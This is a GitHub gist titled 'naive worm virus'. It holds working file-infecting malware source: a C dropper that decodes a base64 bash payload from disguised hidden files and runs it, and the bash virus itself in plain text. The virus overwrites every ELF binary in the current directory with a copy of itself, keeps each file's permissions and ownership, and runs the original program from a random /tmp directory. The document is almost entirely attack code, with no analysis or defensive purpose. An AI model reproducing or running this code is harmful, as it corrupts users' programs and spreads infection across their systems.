Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
naive worm virus
#include <stdlib.h>
#include <stdio.h>
char payload[]="IyEvYmluL2Jhc2gKRD0wCkVOQz0iYmFzZTY0IC13IDAiCkRFQz0iYmFzZTY0IC1kIgoKZnVuY3Rpb24gZGJnICgpCnsKCWlmIFsgJEQgLWd0IDAgXTsgdGhlbgoJCWVjaG8gIltERUJVR10gJDI6ICIkMSAxPiYyCglmaQp9CgpmdW5jdGlvbiByYW5kb20gKCkKewoJaWYgWyAteiAiJDEiIF07IHRoZW4KCQlsZW49MTYKCWVsc2UKCQlsZW49JDEKCWZpCglfdD0kKGRkIGlmPS9kZXYvdXJhbmRvbSBvZj0vZGV2L3N0ZG91dCBicz0kbGVuIGNvdW50PTEgMj4vZGV2L251bGx8YmFzZTY0fHNlZCAicy9bXC9cK10vMC9nIikKCWVjaG8gJHtfdDowOiRsZW59Cn0KCgpmdW5jdGlvbiBnZXRfcGVybSAoKQp7CglpZiBbIC16ICIkMSIgXTsgdGhlbgoJCWRiZyAiTm8gZmlsZSBwYXRoIGdpdmVuIiAiZ2V0X3Blcm0iCgkJZWNobyAwCgllbHNlCgkJZWNobyAkKHN0YXQgLWMgIiVhIiAiJDEiIDI+JjEpCglmaQp9CgpmdW5jdGlvbiBzZXRfcGVybSgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXSB8fCBbIC16ICIkMiIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggb3Igbm8gcGVybSBnaXZlbiIgInNldF9wZXJtIgoJCWVjaG8gMgogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICQoY2htb2QgJDEgIiQyIiAyPi9kZXYvbnVsbCkKICAgICAgICBmaQp9CgoKZnVuY3Rpb24gZ2V0X3VnICgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggZ2l2ZW4iICJnZXRfcGVybSIKICAgICAgICAgICAgICAgIGVjaG8gMAogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGVjaG8gJChzdGF0IC1jICIlVTolRyIgIiQxIiAyPiYxKQogICAgICAgIGZpCQp9CgpmdW5jdGlvbiBlbmNfYmluYXJ5ICgpCnsKCWlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBnaXZlbiIgImVuY19iaW5hcnkiCiAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgZWNobyAkKGNhdCAiJDEiIHwkRU5DIDI+JjEpCiAgICAgICAgZmkKfQoKZnVuY3Rpb24gZGVjX2JpbmFyeSgpCnsKCWlmIFsgLXogIiQxIiBdIHx8IFsgLXogIiQyIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBvciBlbmNvZGVkIHBhcmFtIGdpdmVuIiAiZGVjX2JpbmFyeSIKICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBlY2hvICQyfCAkREVDIDI+L2Rldi9udWxsID4gIiQxIgogICAgICAgIGZpCn0KCmZ1bmN0aW9uIHNjYW5uZXIoKQp7CQoJcHRoPSQxCglmb3IgZiBpbiAkcHRoLyo7IGRvCgkJZGJnICJmb3VuZCAkZiIgc2Nhbm5lcgoJCWlmIFsgISAteiAkKGZpbGUgIiRmIiB8Z3JlcCAtb0UgRUxGKSBdICYmICEgW1sgIiRmIiA9PSAiLi92aXJ1cyIgXV07IHRoZW4KCQkJZGJnICJpbmZlY3RpbmcgJGYiIHNjYW5uZXIKCQkJX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCV9wZXJtPSQoZ2V0X3Blcm0gIiRmIikKCQkJX3VnPSQoZ2V0X3VnICIkZiIpCgkJCWRiZyAicGVybSAkX3Blcm0sIHVnICRfdWciIHNjYW5uZXIKCQkJaGVhZCAiJDAiIC1uMTAzID4gIiRmIgoJCQlfdGQ9Ii90bXAvc3NoLSIkKHJhbmRvbSAxMCkKCQkJZWNobyAibWtkaXIgJF90ZCAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJkZWNfYmluYXJ5IFwiJF90ZC8iJChiYXNlbmFtZSAiJGYiKSJcIiAkX3QiID4+ICIkZiIKCQkJZWNobyAiY2hvd24gJF91ZyBcIiRfdGQvJGZcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJjaG1vZCAkX3Blcm0gXCIkX3RkLyRmXCIgMj4vZGV2L251bGwiID4+ICIkZiIKCQkJZWNobyAiXCIkX3RkLyRmXCIgXCRAIiA+PiAiJGYiCgkJCWVjaG8gInJtIC1yZiBcIiRfdGRcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQkjX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCSNlY2hvICJlY2hvICRfdHwgJERFQyB8YmFzaCIgPiAiJGYiCgkJCWNob3duICRfdWcgIiRmIiAyPi9kZXYvbnVsbAoJCQljaG1vZCAkX3Blcm0gIiRmIiAyPi9kZXYvbnVsbAoJCWZpCglkb25lCQp9CgpzY2FubmVyIC4gMj4vZGV2L251bGwKZWNobyBIZWxsbyEgSSBhbSBhIHNpbXBsZSB2aXJ1cyEKCg==";
void main(){
char cmd[3000]="/bin/bash";
FILE *f = fopen(".vimcr", "w");
if(f==NULL){exit(1);}
fprintf(f, payload);
fclose(f);
system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr");
unlink(".vimcr");
unlink(".screencr");
}
#!/bin/bash
D=0
ENC="base64 -w 0"
DEC="base64 -d"
function dbg ()
{
if [ $D -gt 0 ]; then
echo "[DEBUG] $2: "$1 1>&2
fi
}
function random ()
{
if [ -z "$1" ]; then
len=16
else
len=$1
fi
_t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g")
echo ${_t:0:$len}
}
function get_perm ()
{
if [ -z "$1" ]; then
dbg "No file path given" "get_perm"
echo 0
else
echo $(stat -c "%a" "$1" 2>&1)
fi
}
function set_perm()
{
if [ -z "$1" ] || [ -z "$2" ]; then
dbg "No file path or no perm given" "set_perm"
echo 2
else
$(chmod $1 "$2" 2>/dev/null)
fi
}
function get_ug ()
{
if [ -z "$1" ]; then
dbg "No file path given" "get_perm"
echo 0
else
echo $(stat -c "%U:%G" "$1" 2>&1)
fi
}
function enc_binary ()
{
if [ -z "$1" ]; then
dbg "No file path given" "enc_binary"
else
echo $(cat "$1" |$ENC 2>&1)
fi
}
function dec_binary()
{
if [ -z "$1" ] || [ -z "$2" ]; then
dbg "No file path or encoded param given" "dec_binary"
else
echo $2| $DEC 2>/dev/null > "$1"
fi
}
function scanner()
{
pth=$1
for f in $pth/*; do
dbg "found $f" scanner
if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then
dbg "infecting $f" scanner
_t=$(enc_binary "$f")
_perm=$(get_perm "$f")
_ug=$(get_ug "$f")
dbg "perm $_perm, ug $_ug" scanner
head "$0" -n103 > "$f"
_td="/tmp/ssh-"$(random 10)
echo "mkdir $_td 2>/dev/null" >> "$f"
echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f"
echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f"
echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f"
echo "\"$_td/$f\" \$@" >> "$f"
echo "rm -rf \"$_td\" 2>/dev/null" >> "$f"
#_t=$(enc_binary "$f")
#echo "echo $_t| $DEC |bash" > "$f"
chown $_ug "$f" 2>/dev/null
chmod $_perm "$f" 2>/dev/null
fi
done
}
scanner . 2>/dev/null
echo You're doomed!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment